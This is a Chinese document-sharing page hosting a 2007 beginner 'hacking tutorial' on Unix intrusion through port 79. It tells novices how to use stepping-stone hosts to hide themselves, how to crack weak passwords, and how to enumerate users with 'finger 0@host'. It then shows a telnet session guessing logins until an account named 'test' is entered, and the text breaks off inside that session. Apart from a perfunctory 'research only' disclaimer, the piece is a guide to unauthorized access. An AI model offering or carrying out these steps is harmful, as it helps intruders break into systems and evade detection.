資源描述:
《unix入侵教程 (79端口)》由會員上傳分享,免費在線閱讀,更多相關(guān)內(nèi)容在行業(yè)資料-天天文庫。
1、unix入侵教程(79端口)unix入侵教程(79端口)2007-03-1317:40unix入侵教程我寫這篇文章的目的是給那些想學黑客技術(shù)的菜鳥們看的,如果您已經(jīng)是高手了,您可以跳過去沒必要看了J這里所講敘的是從尋找跳板開始到如何擦PP的完整過程.這篇文章純屬研究性文章.請不要將此用于不正當途徑.后果自負!!!最后,如果要轉(zhuǎn)載本文請保持文章的完整性,以尊重作者的版權(quán)J一.跳板篇這些年網(wǎng)上黑客事件也日益增多了,各個國家與網(wǎng)絡(luò)安全的法令也相繼推出了!因而如果想入侵一個系統(tǒng).而又不想惹上官司,那么自身安全因該是放在第一位.嗯,那么如何才可以保證自己不被發(fā)現(xiàn)呢?談?wù)撨@個問題的文
2、章出來了很多,但在這眾多的方法中我還是比較喜歡使用跳板主機(也就是平時說的堡壘主機),使用跳板主機有幾點好處,首先是可以隱藏自己,再就是如果有一臺功能齊全的跳板主機可以讓工作達到事半功倍的效果:)那么如果得到一臺跳板主機呢?在網(wǎng)絡(luò)上運行的服務(wù)器有很多,最常見的有UnixLinuxNTW2kSolarisirixFreeBSD不過在這些主機中我最喜歡用W2k和Linux作為攻擊平臺了。W2k的Crack方法有很多比如:輸入法漏洞,Unicode二次編碼漏洞,IPC共享密碼猜測等等,這些漏洞的利用方法有很多,而如何將NT/W2k做成跳板的文章也不少,因而我在這里也沒有必要再重
3、復(fù)了,我建議大家可以看看小榕寫的關(guān)于如何利用IPC的補充文檔,上面有如何將NT/W2k做成跳板的詳細過程!下面我主要介紹如何制作Linux的跳板主機,要得到一臺Linux可以用破譯弱口令的方法得到,至于破譯弱口令的工具我感覺流光是最好用的:)你可以到www.netxeyes.org免費得到。如果不想下工具的朋友,可以使用Finger命令來得到弱口令列表:比如我們已經(jīng)知道xxx.xxx.xxx.xxx的79端口開放,那么我們可以輕易的得到一些薄弱主機的用戶列表J――――――――――――――――――test――――――――――――――――――c:>finger0@xxx.xx
4、x.xxx.xxx[xxx.xxx.xxx.xxx]finger:0:nosuchuser------------------------------------------------------end------------------------------------------------------失?。海ê呛?。。。沒關(guān)系啦,別灰心我們再來?。?!-------------------------------------------------------test--------------------------------------------------
5、---c:>finger0@xxx.xxx.xxx.xxx[xxx.xxx.xxx.xxx]LoginNameTTYIdleWhenWhereRoot???<….>Bin???<….>Sys???<….>ver21???pst/0211.25.64.2liky???437211.35.26.4how???pst/2211.65.24.8tong???pst/0211.85.24.5test???<….>dv0928???52211.54.25.6nobody???021211.25.42.6imnadm???62211.23.65.5哈哈。。。這么多用戶:)這下我發(fā)了:)
6、c:>telnetxxx.xxx.xxx.xxxRedHatLinuxrelease6.0Publisher'sEdition(Hedwig)Kernel2.2.5-15onani586Login:nobodyPassword:LoginincorrectLogin:imnadmPassword:LoginincorrectLogin:testPassword:###########################################################################However,astheServwillreloadthos
7、eclasses.##insidethe“/usr/proj/gipex/class”.youjust.##needtoremovetheoldclasswiththenewone.###########################################################################$w6:19pmup61day(s),3:40,3users,loadaverage:0.11,0.07,0.10Userttylogin@idleJCPUPCPUwhatrootconsole4Ma